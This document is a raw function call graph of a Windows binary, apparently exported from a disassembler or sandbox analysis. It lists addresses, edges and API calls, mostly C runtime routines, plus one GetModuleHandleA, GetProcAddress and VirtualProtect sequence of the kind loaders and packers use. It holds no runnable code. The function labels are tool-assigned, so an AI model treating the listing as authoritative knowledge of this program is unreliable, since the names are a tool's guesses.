20de353c 7172->7173 7174 20de397d 7172->7174 7176 20de3c50 7173->7176 7175 20de3987 RtlDeleteCriticalSection 7174->7175 7175->7173 7175->7175 7177 20de3c7f 7176->7177 7178 20de3c59 7176->7178 7177->7161 7178->7177 7179 20de3c69 FreeLibrary 7178->7179 7179->7178 7181 20de3a82 try_get_function 5 API calls 7180->7181 7182 20de3b46 7181->7182 7183 20de3b5e TlsFree 7182->7183 7184 20de3b52 7182->7184 7183->7184 7184->7170 7185 20de7b48 7195 20de8ebf 7185->7195 7189 20de7b55 7208 20de907c 7189->7208 7192 20de7b7f 7193 20de571e _free 20 API calls 7192->7193 7194 20de7b8a 7193->7194 7212 20de8ec8 7195->7212 7197 20de7b50 7198 20de8fdc 7197->7198 7199 20de8fe8 ___DestructExceptionObject 7198->7199 7232 20de5671 RtlEnterCriticalSection 7199->7232 7201 20de905e 7246 20de9073 7201->7246 7203 20de906a _abort 7203->7189 7204 20de9032 RtlDeleteCriticalSection 7206 20de571e _free 20 API calls 7204->7206 7207 20de8ff3 7206->7207 7207->7201 7207->7204 7233 20dea09c 7207->7233 7209 20de7b64 RtlDeleteCriticalSection 7208->7209 7210 20de9092 7208->7210 7209->7189 7209->7192 7210->7209 7211 20de571e _free 20 API calls 7210->7211 7211->7209 7213 20de8ed4 ___DestructExceptionObject 7212->7213 7222 20de5671 RtlEnterCriticalSection 7213->7222 7215 20de8f77 7227 20de8f97 7215->7227 7219 20de8ee3 7219->7215 7221 20de8e78 66 API calls 7219->7221 7223 20de7b94 RtlEnterCriticalSection 7219->7223 7224 20de8f6d 7219->7224 7220 20de8f83 _abort 7220->7197 7221->7219 7222->7219 7223->7219 7230 20de7ba8 RtlLeaveCriticalSection 7224->7230 7226 20de8f75 7226->7219 7231 20de56b9 RtlLeaveCriticalSection 7227->7231 7229 20de8f9e 7229->7220 7230->7226 7231->7229 7232->7207 7234 20dea0a8 ___DestructExceptionObject 7233->7234 7235 20dea0ce 7234->7235 7236 20dea0b9 7234->7236 7245 20dea0c9 _abort 7235->7245 7249 20de7b94 RtlEnterCriticalSection 7235->7249 7237 20de6368 __dosmaperr 20 API calls 7236->7237 7238 20dea0be 7237->7238 7240 20de62ac ___std_exception_copy 26 API calls 7238->7240 7240->7245 7241 20dea0ea 7250 20dea026 7241->7250 7243 20dea0f5 7266 20dea112 7243->7266 7245->7207 7514 20de56b9 RtlLeaveCriticalSection 7246->7514 7248 20de907a 7248->7203 7249->7241 7251 20dea048 7250->7251 7252 20dea033 7250->7252 7258 20dea043 7251->7258 7269 20de8e12 7251->7269 7253 20de6368 __dosmaperr 20 API calls 7252->7253 7254 20dea038 7253->7254 7256 20de62ac ___std_exception_copy 26 API calls 7254->7256 7256->7258 7258->7243 7259 20de907c 20 API calls 7260 20dea064 7259->7260 7275 20de7a5a 7260->7275 7262 20dea06a 7282 20deadce 7262->7282 7265 20de571e _free 20 API calls 7265->7258 7513 20de7ba8 RtlLeaveCriticalSection 7266->7513 7268 20dea11a 7268->7245 7270 20de8e2a 7269->7270 7274 20de8e26 7269->7274 7271 20de7a5a 26 API calls 7270->7271 7270->7274 7272 20de8e4a 7271->7272 7297 20de9a22 7272->7297 7274->7259 7276 20de7a7b 7275->7276 7277 20de7a66 7275->7277 7276->7262 7278 20de6368 __dosmaperr 20 API calls 7277->7278 7279 20de7a6b 7278->7279 7280 20de62ac ___std_exception_copy 26 API calls 7279->7280 7281 20de7a76 7280->7281 7281->7262 7283 20deaddd 7282->7283 7284 20deadf2 7282->7284 7286 20de6355 __dosmaperr 20 API calls 7283->7286 7285 20deae2d 7284->7285 7289 20deae19 7284->7289 7287 20de6355 __dosmaperr 20 API calls 7285->7287 7288 20deade2 7286->7288 7290 20deae32 7287->7290 7291 20de6368 __dosmaperr 20 API calls 7288->7291 7470 20deada6 7289->7470 7293 20de6368 __dosmaperr 20 API calls 7290->7293 7294 20dea070 7291->7294 7295 20deae3a 7293->7295 7294->7258 7294->7265 7296 20de62ac ___std_exception_copy 26 API calls 7295->7296 7296->7294 7298 20de9a2e ___DestructExceptionObject 7297->7298 7299 20de9a4e 7298->7299 7300 20de9a36 7298->7300 7302 20de9aec 7299->7302 7307 20de9a83 7299->7307 7322 20de6355 7300->7322 7304 20de6355 __dosmaperr 20 API calls 7302->7304 7306 20de9af1 7304->7306 7305 20de6368 __dosmaperr 20 API calls 7316 20de9a43 _abort 7305->7316 7308 20de6368 __dosmaperr 20 API calls 7306->7308 7325 20de8c7b RtlEnterCriticalSection 7307->7325 7310 20de9af9 7308->7310 7312 20de62ac ___std_exception_copy 26 API calls 7310->7312 7311 20de9a89 7313 20de9aba 7311->7313 7314 20de9aa5 7311->7314 7312->7316 7326 20de9b0d 7313->7326 7315 20de6368 __dosmaperr 20 API calls 7314->7315 7318 20de9aaa 7315->7318 7316->7274 7320 20de6355 __dosmaperr 20 API calls 7318->7320 7319 20de9ab5 7377 20de9ae4 7319->7377 7320->7319 7323 20de5b7a __dosmaperr 20 API calls 7322->7323 7324 20de635a 7323->7324 7324->7305 7325->7311 7327 20de9b3b 7326->7327 7365 20de9b34 7326->7365 7328 20de9b5e 7327->7328 7329 20de9b3f 7327->7329 7332 20de9b92 7328->7332 7337 20de9baf 7328->7337 7331 20de6355 __dosmaperr 20 API calls 7329->7331 7330 20de2ada _ValidateLocalCookies 5 API calls 7333 20de9d15 7330->7333 7334 20de9b44 7331->7334 7335 20de6355 __dosmaperr 20 API calls 7332->7335 7333->7319 7338 20de6368 __dosmaperr 20 API calls 7334->7338 7340 20de9b97 7335->7340 7336 20de9bc5 7383 20de96b2 7336->7383 7337->7336 7380 20dea00b 7337->7380 7342 20de9b4b 7338->7342 7345 20de6368 __dosmaperr 20 API calls 7340->7345 7343 20de62ac ___std_exception_copy 26 API calls 7342->7343 7343->7365 7348 20de9b9f 7345->7348 7346 20de9c0c 7352 20de9c66 WriteFile 7346->7352 7353 20de9c20 7346->7353 7347 20de9bd3 7349 20de9bf9 7347->7349 7350 20de9bd7 7347->7350 7351 20de62ac ___std_exception_copy 26 API calls 7348->7351 7395 20de9492 GetConsoleCP 7349->7395 7354 20de9ccd 7350->7354 7390 20de9645 7350->7390 7351->7365 7356 20de9c89 GetLastError 7352->7356 7363 20de9bef 7352->7363 7357 20de9c28 7353->7357 7358 20de9c56 7353->7358 7354->7365 7366 20de6368 __dosmaperr 20 API calls 7354->7366 7356->7363 7359 20de9c2d 7357->7359 7360 20de9c46 7357->7360 7421 20de9728 7358->7421 7359->7354 7406 20de9807 7359->7406 7413 20de98f5 7360->7413 7363->7354 7363->7365 7369 20de9ca9 7363->7369 7365->7330 7368 20de9cf2 7366->7368 7372 20de6355 __dosmaperr 20 API calls 7368->7372 7370 20de9cc4 7369->7370 7371 20de9cb0 7369->7371 7428 20de6332 7370->7428 7373 20de6368 __dosmaperr 20 API calls 7371->7373 7372->7365 7375 20de9cb5 7373->7375 7376 20de6355 __dosmaperr 20 API calls 7375->7376 7376->7365 7469 20de8c9e RtlLeaveCriticalSection 7377->7469 7379 20de9aea 7379->7316 7433 20de9f8d 7380->7433 7455 20de8dbc 7383->7455 7385 20de96c2 7386 20de5af6 _abort 38 API calls 7385->7386 7387 20de96c7 7385->7387 7388 20de96ea 7386->7388 7387->7346 7387->7347 7388->7387 7389 20de9708 GetConsoleMode 7388->7389 7389->7387 7393 20de969f 7390->7393 7394 20de966a 7390->7394 7391 20de96a1 GetLastError 7391->7393 7392 20dea181 WriteConsoleW CreateFileW 7392->7394 7393->7363 7394->7391 7394->7392 7394->7393 7400 20de9607 7395->7400 7404 20de94f5 7395->7404 7396 20de2ada _ValidateLocalCookies 5 API calls 7398 20de9641 7396->7398 7398->7363 7399 20de79e6 40 API calls __fassign 7399->7404 7400->7396 7401 20de957b WideCharToMultiByte 7401->7400 7402 20de95a1 WriteFile 7401->7402 7403 20de962a GetLastError 7402->7403 7402->7404 7403->7400 7404->7399 7404->7400 7404->7401 7405 20de95d2 WriteFile 7404->7405 7464 20de7c19 7404->7464 7405->7403 7405->7404 7411 20de9816 7406->7411 7407 20de98d8 7408 20de2ada _ValidateLocalCookies 5 API calls 7407->7408 7410 20de98f1 7408->7410 7409 20de9894 WriteFile 7409->7411 7412 20de98da GetLastError 7409->7412 7410->7363 7411->7407 7411->7409 7412->7407 7420 20de9904 7413->7420 7414 20de9a0f 7415 20de2ada _ValidateLocalCookies 5 API calls 7414->7415 7417 20de9a1e 7415->7417 7416 20de9986 WideCharToMultiByte 7418 20de99bb WriteFile 7416->7418 7419 20de9a07 GetLastError 7416->7419 7417->7363 7418->7419 7418->7420 7419->7414 7420->7414 7420->7416 7420->7418 7425 20de9737 7421->7425 7422 20de97ea 7423 20de2ada _ValidateLocalCookies 5 API calls 7422->7423 7427 20de9803 7423->7427 7424 20de97a9 WriteFile 7424->7425 7426 20de97ec GetLastError 7424->7426 7425->7422 7425->7424 7426->7422 7427->7363 7429 20de6355 __dosmaperr 20 API calls 7428->7429 7430 20de633d __dosmaperr 7429->7430 7431 20de6368 __dosmaperr 20 API calls 7430->7431 7432 20de6350 7431->7432 7432->7365 7442 20de8d52 7433->7442 7435 20de9f9f 7436 20de9fb8 SetFilePointerEx 7435->7436 7437 20de9fa7 7435->7437 7439 20de9fac 7436->7439 7440 20de9fd0 GetLastError 7436->7440 7438 20de6368 __dosmaperr 20 API calls 7437->7438 7438->7439 7439->7336 7441 20de6332 __dosmaperr 20 API calls 7440->7441 7441->7439 7443 20de8d5f 7442->7443 7444 20de8d74 7442->7444 7445 20de6355 __dosmaperr 20 API calls 7443->7445 7446 20de6355 __dosmaperr 20 API calls 7444->7446 7448 20de8d99 7444->7448 7447 20de8d64 7445->7447 7449 20de8da4 7446->7449 7450 20de6368 __dosmaperr 20 API calls 7447->7450 7448->7435 7451 20de6368 __dosmaperr 20 API calls 7449->7451 7452 20de8d6c 7450->7452 7453 20de8dac 7451->7453 7452->7435 7454 20de62ac ___std_exception_copy 26 API calls 7453->7454 7454->7452 7456 20de8dc9 7455->7456 7458 20de8dd6 7455->7458 7457 20de6368 __dosmaperr 20 API calls 7456->7457 7459 20de8dce 7457->7459 7460 20de8de2 7458->7460 7461 20de6368 __dosmaperr 20 API calls 7458->7461 7459->7385 7460->7385 7462 20de8e03 7461->7462 7463 20de62ac ___std_exception_copy 26 API calls 7462->7463 7463->7459 7465 20de5af6 _abort 38 API calls 7464->7465 7466 20de7c24 7465->7466 7467 20de7a00 __fassign 38 API calls 7466->7467 7468 20de7c34 7467->7468 7468->7404 7469->7379 7473 20dead24 7470->7473 7472 20deadca 7472->7294 7474 20dead30 ___DestructExceptionObject 7473->7474 7484 20de8c7b RtlEnterCriticalSection 7474->7484 7476 20dead3e 7477 20dead65 7476->7477 7478 20dead70 7476->7478 7485 20deae4d 7477->7485 7480 20de6368 __dosmaperr 20 API calls 7478->7480 7481 20dead6b 7480->7481 7500 20dead9a 7481->7500 7483 20dead8d _abort 7483->7472 7484->7476 7486 20de8d52 26 API calls 7485->7486 7488 20deae5d 7486->7488 7487 20deae63 7503 20de8cc1 7487->7503 7488->7487 7489 20deae95 7488->7489 7491 20de8d52 26 API calls 7488->7491 7489->7487 7492 20de8d52 26 API calls 7489->7492 7495 20deae8c 7491->7495 7496 20deaea1 CloseHandle 7492->7496 7494 20deaedd 7494->7481 7498 20de8d52 26 API calls 7495->7498 7496->7487 7499 20deaead GetLastError 7496->7499 7497 20de6332 __dosmaperr 20 API calls 7497->7494 7498->7489 7499->7487 7512 20de8c9e RtlLeaveCriticalSection 7500->7512 7502 20deada4 7502->7483 7504 20de8d37 7503->7504 7505 20de8cd0 7503->7505 7506 20de6368 __dosmaperr 20 API calls 7504->7506 7505->7504 7511 20de8cfa 7505->7511 7507 20de8d3c 7506->7507 7508 20de6355 __dosmaperr 20 API calls 7507->7508 7509 20de8d27 7508->7509 7509->7494 7509->7497 7510 20de8d21 SetStdHandle 7510->7509 7511->7509 7511->7510 7512->7502 7513->7268 7514->7248 7043 20de8a89 7044 20de6d60 51 API calls 7043->7044 7045 20de8a8e 7044->7045 7515 20de2049 7516 20de2055 ___DestructExceptionObject 7515->7516 7517 20de207d 7516->7517 7518 20de20d3 7516->7518 7528 20de205e 7516->7528 7529 20de244c 7517->7529 7550 20de2639 IsProcessorFeaturePresent 7518->7550 7521 20de20da 7522 20de2082 7538 20de2308 7522->7538 7524 20de2087 __RTC_Initialize 7541 20de20c4 7524->7541 7526 20de209f 7544 20de260b 7526->7544 7530 20de2451 ___scrt_release_startup_lock 7529->7530 7531 20de2455 7530->7531 7533 20de2461 7530->7533 7532 20de527a _abort 20 API calls 7531->7532 7534 20de245f 7532->7534 7535 20de246e 7533->7535 7536 20de499b _abort 28 API calls 7533->7536 7534->7522 7535->7522 7537 20de4bbd 7536->7537 7537->7522 7554 20de34c7 RtlInterlockedFlushSList 7538->7554 7540 20de2312 7540->7524 7556 20de246f 7541->7556 7543 20de20c9 ___scrt_release_startup_lock 7543->7526 7545 20de2617 7544->7545 7546 20de262d 7545->7546 7564 20de53ed 7545->7564 7546->7528 7549 20de3529 ___vcrt_uninitialize 8 API calls 7549->7546 7551 20de264e ___scrt_fastfail 7550->7551 7552 20de26f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7551->7552 7553 20de2744 ___scrt_fastfail 7552->7553 7553->7521 7555 20de34d7 7554->7555 7555->7540 7561 20de53ff 7556->7561 7559 20de391b ___vcrt_uninitialize_ptd 6 API calls 7560 20de354d 7559->7560 7560->7543 7562 20de5c2b 11 API calls 7561->7562 7563 20de2476 7562->7563 7563->7559 7567 20de74da 7564->7567 7568 20de74f3 7567->7568 7569 20de2ada _ValidateLocalCookies 5 API calls 7568->7569 7570 20de2625 7569->7570 7570->7549 6926 20dea1c6 IsProcessorFeaturePresent 6927 20de7bc7 6928 20de7bd3 ___DestructExceptionObject 6927->6928 6929 20de7c0a _abort 6928->6929 6935 20de5671 RtlEnterCriticalSection 6928->6935 6931 20de7be7 6932 20de7f86 __fassign 20 API calls 6931->6932 6933 20de7bf7 6932->6933 6936 20de7c10 6933->6936 6935->6931 6939 20de56b9 RtlLeaveCriticalSection 6936->6939 6938 20de7c17 6938->6929 6939->6938 7571 20dea945 7572 20dea96d 7571->7572 7573 20dea9a5 7572->7573 7574 20dea99e 7572->7574 7575 20dea997 7572->7575 7584 20deaa00 7574->7584 7580 20deaa17 7575->7580 7581 20deaa20 7580->7581 7588 20deb19b 7581->7588 7585 20deaa20 7584->7585 7586 20deb19b __startOneArgErrorHandling 21 API calls 7585->7586 7587 20dea9a3 7586->7587 7589 20deb1da __startOneArgErrorHandling 7588->7589 7594 20deb25c __startOneArgErrorHandling 7589->7594 7598 20deb59e 7589->7598 7591 20deb286 7593 20deb292 7591->7593 7605 20deb8b2 7591->7605 7596 20de2ada _ValidateLocalCookies 5 API calls 7593->7596 7594->7591 7601 20de78a3 7594->7601 7597 20dea99c 7596->7597 7612 20deb5c1 7598->7612 7602 20de78cb 7601->7602 7603 20de2ada _ValidateLocalCookies 5 API calls 7602->7603 7604 20de78e8 7603->7604 7604->7591 7606 20deb8bf 7605->7606 7607 20deb8d4 7605->7607 7608 20deb8d9 7606->7608 7610 20de6368 __dosmaperr 20 API calls 7606->7610 7609 20de6368 __dosmaperr 20 API calls 7607->7609 7608->7593 7609->7608 7611 20deb8cc 7610->7611 7611->7593 7613 20deb5ec __raise_exc 7612->7613 7614 20deb7e5 RaiseException 7613->7614 7615 20deb5bc 7614->7615 7615->7594 7616 20deaf43 7617 20deaf4d 7616->7617 7618 20deaf59 7616->7618 7617->7618 7619 20deaf52 CloseHandle 7617->7619 7619->7618 7732 20de7103 GetCommandLineA GetCommandLineW 7733 20de5303 7736 20de50a5 7733->7736 7745 20de502f 7736->7745 7739 20de502f 5 API calls 7740 20de50c3 7739->7740 7741 20de5000 20 API calls 7740->7741 7742 20de50ce 7741->7742 7743 20de5000 20 API calls 7742->7743 7744 20de50d9 7743->7744 7746 20de5048 7745->7746 7747 20de2ada _ValidateLocalCookies 5 API calls 7746->7747 7748 20de5069 7747->7748 7748->7739 7046 20de7a80 7047 20de7a8d 7046->7047 7048 20de637b __dosmaperr 20 API calls 7047->7048 7049 20de7aa7 7048->7049 7050 20de571e _free 20 API calls 7049->7050 7051 20de7ab3 7050->7051 7052 20de637b __dosmaperr 20 API calls 7051->7052 7056 20de7ad9 7051->7056 7053 20de7acd 7052->7053 7055 20de571e _free 20 API calls 7053->7055 7054 20de5eb7 11 API calls 7054->7056 7055->7056 7056->7054 7057 20de7ae5 7056->7057 7620 20de8640 7623 20de8657 7620->7623 7624 20de8679 7623->7624 7625 20de8665 7623->7625 7626 20de8693 7624->7626 7627 20de8681 7624->7627 7628 20de6368 __dosmaperr 20 API calls 7625->7628 7633 20de54a7 __fassign 38 API calls 7626->7633 7634 20de8652 7626->7634 7629 20de6368 __dosmaperr 20 API calls 7627->7629 7630 20de866a 7628->7630 7632 20de8686 7629->7632 7631 20de62ac ___std_exception_copy 26 API calls 7630->7631 7631->7634 7635 20de62ac ___std_exception_copy 26 API calls 7632->7635 7633->7634 7635->7634 6940 20de5bff 6948 20de5d5c 6940->6948 6943 20de5c13 6944 20de5b7a __dosmaperr 20 API calls 6945 20de5c1b 6944->6945 6946 20de5c28 6945->6946 6955 20de5c2b 6945->6955 6949 20de5c45 __dosmaperr 5 API calls 6948->6949 6950 20de5d83 6949->6950 6951 20de5d9b TlsAlloc 6950->6951 6952 20de5d8c 6950->6952 6951->6952 6953 20de2ada _ValidateLocalCookies 5 API calls 6952->6953 6954 20de5c09 6953->6954 6954->6943 6954->6944 6956 20de5c35 6955->6956 6957 20de5c3b 6955->6957 6959 20de5db2 6956->6959 6957->6943 6960 20de5c45 __dosmaperr 5 API calls 6959->6960 6961 20de5dd9 6960->6961 6962 20de5df1 TlsFree 6961->6962 6965 20de5de5 6961->6965 6962->6965 6963 20de2ada _ValidateLocalCookies 5 API calls 6964 20de5e02 6963->6964 6964->6957 6965->6963 7058 20de67bf 7063 20de67f4 7058->7063 7061 20de67db 7062 20de571e _free 20 API calls 7062->7061 7064 20de6806 7063->7064 7065 20de67cd 7063->7065 7066 20de680b 7064->7066 7067 20de6836 7064->7067 7065->7061 7065->7062 7068 20de637b __dosmaperr 20 API calls 7066->7068 7067->7065 7074 20de71d6 7067->7074 7070 20de6814 7068->7070 7072 20de571e _free 20 API calls 7070->7072 7071 20de6851 7073 20de571e _free 20 API calls 7071->7073 7072->7065 7073->7065 7075 20de71e1 7074->7075 7076 20de7209 7075->7076 7077 20de71fa 7075->7077 7078 20de7218 7076->7078 7083 20de8a98 7076->7083 7079 20de6368 __dosmaperr 20 API calls 7077->7079 7090 20de8acb 7078->7090 7082 20de71ff ___scrt_fastfail 7079->7082 7082->7071 7084 20de8ab8 RtlSizeHeap 7083->7084 7085 20de8aa3 7083->7085 7084->7078 7086 20de6368 __dosmaperr 20 API calls 7085->7086 7087 20de8aa8 7086->7087 7088 20de62ac ___std_exception_copy 26 API calls 7087->7088 7089 20de8ab3 7088->7089 7089->7078 7091 20de8ad8 7090->7091 7092 20de8ae3 7090->7092 7093 20de56d0 21 API calls 7091->7093 7094 20de8aeb 7092->7094 7100 20de8af4 __dosmaperr 7092->7100 7098 20de8ae0 7093->7098 7095 20de571e _free 20 API calls 7094->7095 7095->7098 7096 20de8b1e RtlReAllocateHeap 7096->7098 7096->7100 7097 20de8af9 7099 20de6368 __dosmaperr 20 API calls 7097->7099 7098->7082 7099->7098 7100->7096 7100->7097 7101 20de474f __dosmaperr 7 API calls 7100->7101 7101->7100 7749 20de1f3f 7750 20de1f4b ___DestructExceptionObject 7749->7750 7767 20de247c 7750->7767 7752 20de1f52 7753 20de1f7c 7752->7753 7754 20de2041 7752->7754 7760 20de1f57 ___scrt_is_nonwritable_in_current_image 7752->7760 7778 20de23de 7753->7778 7756 20de2639 ___scrt_fastfail 4 API calls 7754->7756 7757 20de2048 7756->7757 7758 20de1f8b __RTC_Initialize 7758->7760 7781 20de22fc RtlInitializeSListHead 7758->7781 7761 20de1f99 ___scrt_initialize_default_local_stdio_options 7782 20de46c5 7761->7782 7765 20de1fb8 7765->7760 7766 20de4669 _abort 5 API calls 7765->7766 7766->7760 7768 20de2485 7767->7768 7790 20de2933 IsProcessorFeaturePresent 7768->7790 7772 20de2496 7773 20de249a 7772->7773 7801 20de53c8 7772->7801 7773->7752 7776 20de24b1 7776->7752 7777 20de3529 ___vcrt_uninitialize 8 API calls 7777->7773 7832 20de24b5 7778->7832 7780 20de23e5 7780->7758 7781->7761 7783 20de46dc 7782->7783 7784 20de2ada _ValidateLocalCookies 5 API calls 7783->7784 7785 20de1fad 7784->7785 7785->7760 7786 20de23b3 7785->7786 7787 20de23b8 ___scrt_release_startup_lock 7786->7787 7788 20de2933 ___isa_available_init IsProcessorFeaturePresent 7787->7788 7789 20de23c1 7787->7789 7788->7789 7789->7765 7791 20de2491 7790->7791 7792 20de34ea 7791->7792 7793 20de34ef ___vcrt_initialize_winapi_thunks 7792->7793 7804 20de3936 7793->7804 7797 20de3505 7798 20de3510 7797->7798 7799 20de3972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7797->7799 7798->7772 7800 20de34fd 7799->7800 7800->7772 7828 20de7457 7801->7828 7805 20de393f 7804->7805 7807 20de3968 7805->7807 7808 20de34f9 7805->7808 7818 20de3be0 7805->7818 7809 20de3972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7807->7809 7808->7800 7810 20de38e8 7808->7810 7809->7808 7823 20de3af1 7810->7823 7813 20de38fd 7813->7797 7814 20de3ba2 ___vcrt_FlsSetValue 6 API calls 7815 20de390b 7814->7815 7816 20de3918 7815->7816 7817 20de391b ___vcrt_uninitialize_ptd 6 API calls 7815->7817 7816->7797 7817->7813 7819 20de3a82 try_get_function 5 API calls 7818->7819 7820 20de3bfa 7819->7820 7821 20de3c18 InitializeCriticalSectionAndSpinCount 7820->7821 7822 20de3c03 7820->7822 7821->7822 7822->7805 7824 20de3a82 try_get_function 5 API calls 7823->7824 7825 20de3b0b 7824->7825 7826 20de3b24 TlsAlloc 7825->7826 7827 20de38f2 7825->7827 7827->7813 7827->7814 7831 20de7470 7828->7831 7829 20de2ada _ValidateLocalCookies 5 API calls 7830 20de24a3 7829->7830 7830->7776 7830->7777 7831->7829 7833 20de24c8 7832->7833 7834 20de24c4 7832->7834 7835 20de2639 ___scrt_fastfail 4 API calls 7833->7835 7837 20de24d5 ___scrt_release_startup_lock 7833->7837 7834->7780 7836 20de2559 7835->7836 7837->7780 7838 20de543d 7839 20de5440 7838->7839 7840 20de55a8 _abort 38 API calls 7839->7840 7841 20de544c 7840->7841 7102 20de3eb3 7103 20de5411 38 API calls 7102->7103 7104 20de3ebb 7103->7104 6966 20de63f0 6967 20de6400 6966->6967 6974 20de6416 6966->6974 6968 20de6368 __dosmaperr 20 API calls 6967->6968 6969 20de6405 6968->6969 6970 20de62ac ___std_exception_copy 26 API calls 6969->6970 6972 20de640f 6970->6972 6971 20de4e76 20 API calls 6978 20de64e5 6971->6978 6973 20de6480 6973->6971 6973->6973 6974->6973 6979 20de6561 6974->6979 6985 20de6580 6974->6985 6976 20de64ee 6977 20de571e _free 20 API calls 6976->6977 6977->6979 6978->6976 6982 20de6573 6978->6982 6996 20de85eb 6978->6996 7005 20de679a 6979->7005 6983 20de62bc ___std_exception_copy 11 API calls 6982->6983 6984 20de657f 6983->6984 6986 20de658c 6985->6986 6986->6986 6987 20de637b __dosmaperr 20 API calls 6986->6987 6988 20de65ba 6987->6988 6989 20de85eb 26 API calls 6988->6989 6990 20de65e6 6989->6990 6991 20de62bc ___std_exception_copy 11 API calls 6990->6991 6992 20de6615 ___scrt_fastfail 6991->6992 6993 20de66b6 FindFirstFileExA 6992->6993 6994 20de6705 6993->6994 6995 20de6580 26 API calls 6994->6995 6997 20de853a 6996->6997 6999 20de8554 6997->6999 7000 20de854f 6997->7000 7002 20de858b 6997->7002 6998 20de6368 __dosmaperr 20 API calls 7004 20de857a 6998->7004 6999->6978 7000->6998 7000->6999 7001 20de62ac ___std_exception_copy 26 API calls 7001->6999 7002->6999 7003 20de6368 __dosmaperr 20 API calls 7002->7003 7003->7004 7004->7001 7009 20de67a4 7005->7009 7006 20de67b4 7008 20de571e _free 20 API calls 7006->7008 7007 20de571e _free 20 API calls 7007->7009 7010 20de67bb 7008->7010 7009->7006 7009->7007 7010->6972 7636 20de3370 7647 20de3330 7636->7647 7648 20de334f 7647->7648 7649 20de3342 7647->7649 7650 20de2ada _ValidateLocalCookies 5 API calls 7649->7650 7650->7648 7842 20de5630 7843 20de563b 7842->7843 7844 20de5eb7 11 API calls 7843->7844 7845 20de5664 7843->7845 7847 20de5660 7843->7847 7844->7843 7848 20de5688 7845->7848 7849 20de56b4 7848->7849 7850 20de5695 7848->7850 7849->7847 7851 20de569f RtlDeleteCriticalSection 7850->7851 7851->7849 7851->7851 7651 20de9e71 7652 20de9e95 7651->7652 7653 20de9ee6 7652->7653 7655 20de9f71 __startOneArgErrorHandling 7652->7655 7654 20deaa53 21 API calls 7653->7654 7656 20de9ef8 7653->7656 7654->7656 7658 20deacad __startOneArgErrorHandling 7655->7658 7659 20deb2f0 7655->7659 7660 20deb329 __startOneArgErrorHandling 7659->7660 7661 20deb5c1 __raise_exc RaiseException 7660->7661 7662 20deb350 __startOneArgErrorHandling 7660->7662 7661->7662 7663 20deb393 7662->7663 7664 20deb36e 7662->7664 7665 20deb8b2 __startOneArgErrorHandling 20 API calls 7663->7665 7670 20deb8e1 7664->7670 7667 20deb38e __startOneArgErrorHandling 7665->7667 7668 20de2ada _ValidateLocalCookies 5 API calls 7667->7668 7669 20deb3b7 7668->7669 7669->7658 7671 20deb8f0 7670->7671 7672 20deb964 __startOneArgErrorHandling 7671->7672 7673 20deb90f __startOneArgErrorHandling 7671->7673 7675 20deb8b2 __startOneArgErrorHandling 20 API calls 7672->7675 7674 20de78a3 __startOneArgErrorHandling 5 API calls 7673->7674 7676 20deb950 7674->7676 7678 20deb95d 7675->7678 7677 20deb8b2 __startOneArgErrorHandling 20 API calls 7676->7677 7676->7678 7677->7678 7678->7667 7679 20de506f 7680 20de5081 7679->7680 7682 20de5087 7679->7682 7681 20de5000 20 API calls 7680->7681 7681->7682 7109 20de60ac 7110 20de60dd 7109->7110 7111 20de60b7 7109->7111 7111->7110 7112 20de60c7 FreeLibrary 7111->7112 7112->7111 7683 20deac6b 7684 20deac84 __startOneArgErrorHandling 7683->7684 7685 20deb2f0 21 API calls 7684->7685 7686 20deacad __startOneArgErrorHandling 7684->7686 7685->7686 7852 20de742b 7853 20de7430 7852->7853 7855 20de7453 7853->7855 7856 20de8bae 7853->7856 7857 20de8bbb 7856->7857 7861 20de8bdd 7856->7861 7858 20de8bc9 RtlDeleteCriticalSection 7857->7858 7859 20de8bd7 7857->7859 7858->7858 7858->7859 7860 20de571e _free 20 API calls 7859->7860 7860->7861 7861->7853 6055 20dec7a7 6056 20dec7be 6055->6056 6061 20dec82c 6055->6061 6056->6061 6067 20dec7e6 GetModuleHandleA 6056->6067 6057 20dec835 GetModuleHandleA 6060 20dec83f 6057->6060 6058 20dec872 6060->6061 6062 20dec85f GetProcAddress 6060->6062 6061->6057 6061->6058 6061->6060 6062->6061 6063 20dec7dd 6063->6060 6063->6061 6064 20dec800 GetProcAddress 6063->6064 6064->6061 6065 20dec80d VirtualProtect 6064->6065 6065->6061 6066 20dec81c VirtualProtect 6065->6066 6066->6061 6068 20dec7ef 6067->6068 6073 20dec82c 6067->6073 6079 20dec803 GetProcAddress 6068->6079 6070 20dec7f4 6070->6073 6074 20dec800 GetProcAddress 6070->6074 6071 20dec835 GetModuleHandleA 6077 20dec83f 6071->6077 6072 20dec872 6073->6071 6073->6072 6073->6077 6074->6073 6075 20dec80d VirtualProtect 6074->6075 6075->6073 6076 20dec81c VirtualProtect 6075->6076 6076->6073 6077->6073 6078 20dec85f GetProcAddress 6077->6078 6078->6073 6080 20dec82c 6079->6080 6081 20dec80d VirtualProtect 6079->6081 6083 20dec835 GetModuleHandleA 6080->6083 6084 20dec872 6080->6084 6081->6080 6082 20dec81c VirtualProtect 6081->6082 6082->6080 6086 20dec83f 6083->6086 6085 20dec85f GetProcAddress 6085->6086 6086->6080 6086->6085 7011 20dea1e0 7014 20dea1fe 7011->7014 7013 20dea1f6 7015 20dea203 7014->7015 7018 20dea298 7015->7018 7019 20deaa53 7015->7019 7018->7013 7020 20deaa70 RtlDecodePointer 7019->7020 7023 20deaa80 7019->7023 7020->7023 7021 20deab0d 7025 20deab02 7021->7025 7026 20de6368 __dosmaperr 20 API calls 7021->7026 7022 20de2ada _ValidateLocalCookies 5 API calls 7024 20dea42f 7022->7024 7023->7021 7023->7025 7027 20deaab7 7023->7027 7024->7013 7025->7022 7026->7025 7027->7025 7028 20de6368 __dosmaperr 20 API calls 7027->7028 7028->7025 7113 20de81a0 7114 20de81d9 7113->7114 7115 20de81dd 7114->7115 7126 20de8205 7114->7126 7116 20de6368 __dosmaperr 20 API calls 7115->7116 7118 20de81e2 7116->7118 7117 20de8529 7119 20de2ada _ValidateLocalCookies 5 API calls 7117->7119 7120 20de62ac ___std_exception_copy 26 API calls 7118->7120 7121 20de8536 7119->7121 7122 20de81ed 7120->7122 7123 20de2ada _ValidateLocalCookies 5 API calls 7122->7123 7125 20de81f9 7123->7125 7126->7117 7127 20de80c0 7126->7127 7128 20de80db 7127->7128 7129 20de2ada _ValidateLocalCookies 5 API calls 7128->7129 7130 20de8152 7129->7130 7130->7126 7687 20de7260 GetStartupInfoW 7688 20de7286 7687->7688 7690 20de7318 7687->7690 7689 20de8be3 27 API calls 7688->7689 7688->7690 7691 